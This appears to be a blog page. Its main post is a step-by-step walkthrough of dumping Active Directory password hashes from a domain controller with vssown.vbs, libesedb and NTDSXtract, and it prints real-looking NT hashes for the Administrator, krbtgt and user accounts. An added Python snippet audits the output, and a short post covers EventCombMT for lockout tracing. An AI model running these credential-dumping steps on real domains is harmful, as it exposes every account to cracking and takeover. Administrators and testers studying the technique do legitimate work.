Active Directory Password Dump

I’ve seen a few posts on dumping password hashes from Active Directory. The concept is pretty simple: you use VSS (Volume Shadow Copy) to copy the SYSTEM and ntds.dit files, then you use a tool written by Csaba Barta to extract the hashes. Since VSS is enabled by default on 2008, this should be pretty simple. There is a VBScript called VSSOwn that will do this for you. I was able to create copies of the SYSTEM and ntds.dit files, but was not able to extract the hashes. Why? Csaba Barta’s tool doesn’t currently work with 64-bit systems, bummer. Since I don’t have a 32-bit version to test with, I’m out of luck. Anyway, a nice write-up is available here.

Update –

I decided to try it again, since a 64-bit version of the tool was released. First, run

cscript vssown.vbs /create

to create the volume shadow copy, then run

cscript vssown.vbs /list

to confirm that it worked, then copy the SYSTEM and ntds.dit files.

Download libesedb and NTDSXtract (current version is 1.0).

Then run the following:

root@bt:~# cd libesedb-20120102/ 
root@bt:~/libesedb-20120102# ./configure  && make

Lots of text scrolls by :)

root@bt:~/libesedb-20120102# cd esedbtools/
root@bt:~/libesedb-20120102/esedbtools# ./esedbexport /root/ntds.dit
esedbexport 20120102

Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
root@bt:~/libesedb-20120102/esedbtools# cd ntds.dit.export/
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# ls
datatable.3
hiddentable.4
link_table.5
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp datatable.3 /root
root@bt:~/libesedb-20120102/esedbtools/ntds.dit.export# cp link_table.5 /root

Now we can use dsusers.py to extract the hashes:

root@bt:~/NTDSXtract 1.0# python ./dsusers.py /root/datatable.3 /root/link_table.5 --passwordhashes /root/SYSTEM
Running with options:
Extracting password hashes
Initialising engine...
Scanning database - 100% -> 3491 records processed
Extracting schema information - 100% -> 1549 records processed
Extracting object links...
List of users:
==============
Record ID:           3562 
User name:           Administrator 
User principal name: 
SAM Account name:    Administrator 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: aa7020f0-d702-4608-bb51-4f9901113317 
SID:  S-1-5-21-2539783424-2987255661-3794136379-500 
When created:         2011-09-18 16:19:03 
When changed:         2012-02-05 15:24:36 
Account expires:      Never 
Password last set:    2012-02-05 15:24:36.328125 
Last logon:           2012-02-05 15:25:12.078125 
Last logon timestamp: 2012-02-05 15:24:36.328125 
Bad password time     2012-02-05 15:23:29.375000 
Logon count:          25 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users Administrator
Password hashes: Administrator:$NT$9bff06fe611486579fb74037890fda96::: 
Record ID:           3563 
User name:           Guest 
User principal name: 
SAM Account name:    Guest 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 01b08029-af28-4f0b-a6be-e39a9eff6bfa 
SID:  S-1-5-21-2539783424-2987255661-3794136379-501 
When created:         2011-09-18 16:19:04 
When changed:         2011-09-18 16:19:04 
Account expires:      Never 
Password last set:    Never 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled PWD Not Required NORMAL_ACCOUNT PWD Never Expires
Ancestors: $ROOT_OBJECT$ us keithsoffice Users Guest
Password hashes: 
Record ID:           3609 
User name:           krbtgt 
User principal name: 
SAM Account name:    krbtgt 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 290688a7-60a4-4baa-b860-33eda516793a 
SID:  S-1-5-21-2539783424-2987255661-3794136379-502 
When created:         2011-09-18 16:22:35 
When changed:         2011-09-18 16:37:59 
Account expires:      Never 
Password last set:    2011-09-18 16:22:35.843750 
Last logon:           Never 
Last logon timestamp: Never 
Bad password time     Never 
Logon count:          0 
Bad password count:   0 
User Account Control: Disabled NORMAL_ACCOUNT
Ancestors: $ROOT_OBJECT$ us keithsoffice Users krbtgt
Password hashes: krbtgt:$NT$ef9fde1c17c72af73beb84f7702724c9::: 
Record ID:           3763 
User name:           keith 
User principal name: keith@keithsoffice.us 
SAM Account name:    keith 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 74f63277-6bed-42ea-bdd9-4c9498c2f1d3 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1103 
When created:         2011-09-18 16:57:38 
When changed:         2012-02-05 15:23:54 
Account expires:      Never 
Password last set:    2012-02-05 15:23:54.203125 
Last logon:           2012-02-05 15:23:55.812500 
Last logon timestamp: 2012-02-05 15:23:54.187500 
Bad password time     2011-12-11 04:24:51.625875 
Logon count:          15 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users keith
Password hashes: keith:$NT$8c3efc486704d2ee71eebe71af14d86c::: 
Record ID:           3764 
User name:           keith domain admin 
User principal name: keith-dm@keithsoffice.us 
SAM Account name:    keith-dm 
SAM Account type:    SAM_NORMAL_USER_ACCOUNT 
GUID: 7fbe82fd-eb65-4862-8626-d2127add7283 
SID:  S-1-5-21-2539783424-2987255661-3794136379-1104 
When created:         2011-09-18 16:58:24 
When changed:         2011-10-04 01:58:23 
Account expires:      Never 
Password last set:    2011-10-04 01:57:08.171875 
Last logon:           2011-10-04 02:01:29.359375 
Last logon timestamp: 2011-10-04 01:58:23.781250 
Bad password time     2011-09-18 20:54:49.250000 
Logon count:          9 
Bad password count:   0 
User Account Control: NORMAL_ACCOUNT 
Ancestors: $ROOT_OBJECT$ us keithsoffice Users keith domain admin
Password hashes: keith domain admin:$NT$58a478135a93ac3bf058a5ea0e8fdb71::: 
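
Output like the above is easier to act on when it is parsed rather than read by eye. The following is an added example, not part of the original post or of NTDSXtract: it parses dsusers.py-style records (a constructed sample in the one-field-per-line layout, with a fake placeholder $NT$ value) and flags accounts whose User Account Control carries PWD Not Required or PWD Never Expires, or whose password is older than a threshold; the field labels and the date format are assumed from the output shown above.

```python
import re
from datetime import datetime
# Constructed sample in dsusers.py's one-field-per-line layout; the $NT$ value is a fake placeholder.
SAMPLE = """Record ID:           3562
SAM Account name:    Administrator
Password last set:    2012-02-05 15:24:36.328125
User Account Control: NORMAL_ACCOUNT
Password hashes: Administrator:$NT$00000000000000000000000000000001:::
Record ID:           3563
SAM Account name:    Guest
Password last set:    Never
User Account Control: Disabled PWD Not Required NORMAL_ACCOUNT PWD Never Expires
Record ID:           3609
SAM Account name:    krbtgt
Password last set:    2011-09-18 16:22:35.843750
User Account Control: Disabled NORMAL_ACCOUNT
"""

# "Label:   value"; the label is letters/spaces only, so "Bad password time 2012-.. 15:23" is skipped
FIELD = re.compile(r"^([A-Za-z ]+?):\s*(.*)$")

def parse_records(text):
    """Split dsusers.py output into one dict per 'Record ID' block."""
    records = []
    for line in text.splitlines():
        m = FIELD.match(line.strip())
        if not m:
            continue
        key, val = m.group(1), m.group(2).strip()
        if key == "Record ID":
            records.append({})  # every block opens with its Record ID
        if records:
            records[-1][key] = val
    return records

def audit(records, now, max_age_days=365):
    """Map SAM account name -> findings; accounts with none are omitted."""
    report = {}
    for r in records:
        uac, findings = r.get("User Account Control", ""), []
        for flag in ("PWD Not Required", "PWD Never Expires"):
            if flag in uac:
                findings.append(flag.lower())
        stamp = r.get("Password last set", "Never")
        if stamp != "Never":
            age = (now - datetime.strptime(stamp[:19], "%Y-%m-%d %H:%M:%S")).days
            if age > max_age_days:
                findings.append("password %d days old" % age)
        if findings:
            report[r["SAM Account name"]] = findings
    return report
```

Feed the real dsusers.py output to parse_records instead of SAMPLE and lower max_age_days to whatever your password policy requires.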

Have Fun!

Sources: http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html

VSSOwn

Account lockout tool

This post is mainly for reference purposes. Have you ever had a network account that kept getting locked out and didn’t know why? EventCombMT is a tool provided by Microsoft (included with the Microsoft Account Lockout Management Tools) that allows you to search for lockout events and identifies the computer that is causing the account to be locked out.

It doesn’t tell you why, but once you know which computer is causing the lockouts you can investigate further.